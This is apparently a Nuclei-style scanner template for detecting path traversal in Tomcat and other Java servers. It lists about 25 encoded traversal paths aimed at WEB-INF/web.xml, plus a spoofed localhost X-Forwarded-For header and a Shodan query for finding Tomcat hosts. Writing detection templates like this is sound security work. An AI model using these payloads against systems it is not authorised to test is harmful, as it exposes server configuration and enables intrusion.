id: java_server_traversal_localhost

info:
  name: Tomcat / Java Server Path Traversal Detection__localhost
  author: xandsz
  severity: medium
  description: |
    Detects path traversal vulnerabilities in Tomcat and Java-based servers
    by attempting to access WEB-INF/web.xml using multiple traversal encodings.
  metadata:
    max-request: 30
    shodan-query: 'product:"Apache Tomcat"'
  tags: tomcat,java,path-traversal,webxml

http:
  - method: GET
    path:
      # Basic traversal
      - "{{BaseURL}}/../WEB-INF/web.xml"
      - "{{BaseURL}}/../../WEB-INF/web.xml"
      - "{{BaseURL}}/../../../WEB-INF/web.xml"
      - "{{BaseURL}}/../../../../WEB-INF/web.xml"

      # Tomcat bypass using semicolon /..;/
      - "{{BaseURL}}/..;/WEB-INF/web.xml"
      - "{{BaseURL}}/..;/..;/WEB-INF/web.xml"
      - "{{BaseURL}}/..;/../../WEB-INF/web.xml"

      # Encoded backslash
      - "{{BaseURL}}/%5C../WEB-INF/web.xml"
      - "{{BaseURL}}/%5C../%5C../WEB-INF/web.xml"

      # Double semicolon
      - "{{BaseURL}}/;/WEB-INF/web.xml"
      - "{{BaseURL}}/;;/WEB-INF/web.xml"
      - "{{BaseURL}}/;;/../../WEB-INF/web.xml"

      # Dot bypass
      - "{{BaseURL}}/./../../WEB-INF/web.xml"
      - "{{BaseURL}}/demo/../WEB-INF/web.xml"

      # Normalized traversal used in exploits
      - "{{BaseURL}}/js/app/../../WEB-INF/web.xml"
      - "{{BaseURL}}/js/app/1/../../WEB-INF/web.xml"

      # Unicode traversal (%c0%ae = overlong encoded dot)
      - "{{BaseURL}}/%c0%ae/WEB-INF/web.xml"
      - "{{BaseURL}}/%c0%ae%c0%ae/WEB-INF/web.xml"
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/WEB-INF/web.xml"

      # Double-encoding unicode (%25c0%25ae = encoded %)
      - "{{BaseURL}}/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
      - "{{BaseURL}}/%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
      - "{{BaseURL}}/%25c0%25ae/%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"

      # Overlong UTF-8 payloads known from tomcat CVE studies
      - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/WEB-INF/web.xml"

      # Struts / weird normalization test cases
      - "{{BaseURL}}/wiki/struts/..%252f..%252f/WEB-INF/web.xml"
      - "{{BaseURL}}/..%252f..%252f..%252f/WEB-INF/web.xml"
      - "{{BaseURL}}/..%252f..%252f/WEB-INF/web.xml"

    stop-at-first-match: true

    headers:
      X-Forwarded-For: 127.0.0.1

    matchers-condition: and
    matchers:
      # WEB-INF/web.xml content indicators
      - type: word
        part: body
        condition: or
        words:
          - "<web-app"
          - "<servlet-name>"

      # Expected status codes for traversal attempt
      - type: status
        status:
          - 200
